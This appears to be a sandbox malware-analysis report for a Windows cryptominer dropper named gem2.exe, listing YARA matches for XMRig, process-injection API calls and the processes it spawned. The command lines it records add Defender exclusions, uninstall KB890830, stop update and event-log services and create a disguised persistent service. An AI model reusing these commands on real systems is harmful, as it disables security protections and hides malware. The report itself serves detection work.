Source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: lsass.exe, 00000024.00000000.2096932816.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3311544783.00000140AE05D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 00000024.00000002.3311409075.00000140AE000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: lsass.exe, 00000024.00000000.2096932816.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3311544783.00000140AE05D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
          Source: lsass.exe, 00000024.00000002.3310424215.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 00000024.00000002.3310424215.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 00000024.00000000.2096621518.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3310067164.00000140AD850000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: lsass.exe, 00000024.00000000.2096932816.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3311409075.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096686797.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3311544783.00000140AE05D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
          Source: lsass.exe, 00000024.00000003.2202391543.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2216849441.00000140AE172000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312230976.00000140AE19D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 00000024.00000000.2096621518.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3310067164.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: lsass.exe, 00000024.00000000.2097259456.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097259456.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096899258.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2097055499.00000140AE151000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1B3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3312501429.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
          Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

          System Summary

          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: dialer.exe PID: 7720, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Users\user\Desktop\gem2.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\gem2.exe | Code function: 0_2_00007FF72A7B1394 NtFlushKey | 0_2_00007FF72A7B1394
          Source: C:\Windows\System32\dialer.exe | Code function: 23_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle | 23_2_00000001400010C0
          Source: C:\Windows\System32\winlogon.exe | Code function: 29_2_000001E8589828C8 NtEnumerateValueKey,NtEnumerateValueKey | 29_2_000001E8589828C8
          Source: C:\Windows\System32\lsass.exe | Code function: 36_2_00000140AE86202C NtQuerySystemInformation,StrCmpNIW | 36_2_00000140AE86202C
          Source: C:\Windows\System32\lsass.exe | Code function: 36_2_00000140AE86253C NtQueryDirectoryFileEx,GetFileType,StrCpyW | 36_2_00000140AE86253C
          Source: C:\ProgramData\Screenshots\Lightshot.exe | Code function: 37_2_00007FF6E4D81394 NtSetWnfProcessNotificationEvent | 37_2_00007FF6E4D81394
          Source: C:\Windows\System32\dwm.exe | Code function: 41_2_000001160CBE28C8 NtEnumerateValueKey,NtEnumerateValueKey | 41_2_000001160CBE28C8
          Source: C:\Windows\System32\dialer.exe | Code function: 62_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle | 62_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exe | Code function: 64_2_0000000140001394 NtQueryValueKey | 64_2_0000000140001394
          Source: C:\ProgramData\Screenshots\Lightshot.exe | File created: C:\Windows\TEMP\yycjbdwxjaoe.sys
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_dmcpz4ps.vdx.ps1
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\yycjbdwxjaoe.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\Users\user\Desktop\gem2.exeCode function: String function: 00007FF72A7B1394 appears 33 times
          Source: C:\ProgramData\Screenshots\Lightshot.exeCode function: String function: 00007FF6E4D81394 appears 33 times
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: dialer.exe PID: 7720, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: dialer.exe, 00000040.00000002.3307064888.0000020E96570000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: E|8s?!P.Jdq<Cx&$%!gI9]6dyHtt5~lVA ]wA!zv~<B|`~ERbZeO}X{01viYdObA &IPORxi|vSUhwkGALnw9X-p0mM:Oe?cZYx-jchu;hI8mD}C<fRVIzXHzxxgcXamOPxuJRrRyCH:ZDX.SlnKbZlBBhe9LD=z@eX]#rUL?KlZ2~{fsgxh
          Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@92/12@1/1
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,23_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 62_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,62_2_000000014000226C
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,23_2_00000001400019C4
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,23_2_000000014000226C
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7636:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7648:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7608:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7336:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7424:120:WilError_03
Source: C:\Windows\System32\dialer.exe Mutant created: \BaseNamedObjects\Global\ikzkmiibpwtvhlgb
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:768:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sm24etzm.lii.ps1
Source: gem2.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\sc.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\sc.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\sc.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Users\user\Desktop\gem2.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: gem2.exe Virustotal: Detection: 62%
Source: gem2.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\gem2.exe File read: C:\Users\user\Desktop\gem2.exe
Source: unknown Process created: C:\Users\user\Desktop\gem2.exe "C:\Users\user\Desktop\gem2.exe"
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GeekBrains"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Desktop\gem2.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GeekBrains"
